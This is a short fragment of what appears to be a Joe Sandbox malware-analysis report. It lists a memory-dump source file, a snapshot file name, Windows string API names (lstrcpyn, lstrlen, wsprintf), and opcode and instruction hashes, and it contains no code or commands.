                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID:
                                  • API String ID: 1206339513-0
                                  • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                  • Instruction ID: cf556d70b8ffc62f258fefb865ef3c014a7be785c1c8317b948dd429a64abe9d
                                  • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                  • Instruction Fuzzy Hash: 8401DA79540109FFCB04DFECD998EAE7BBAEF49394F108148F9099B305C635AA40DB95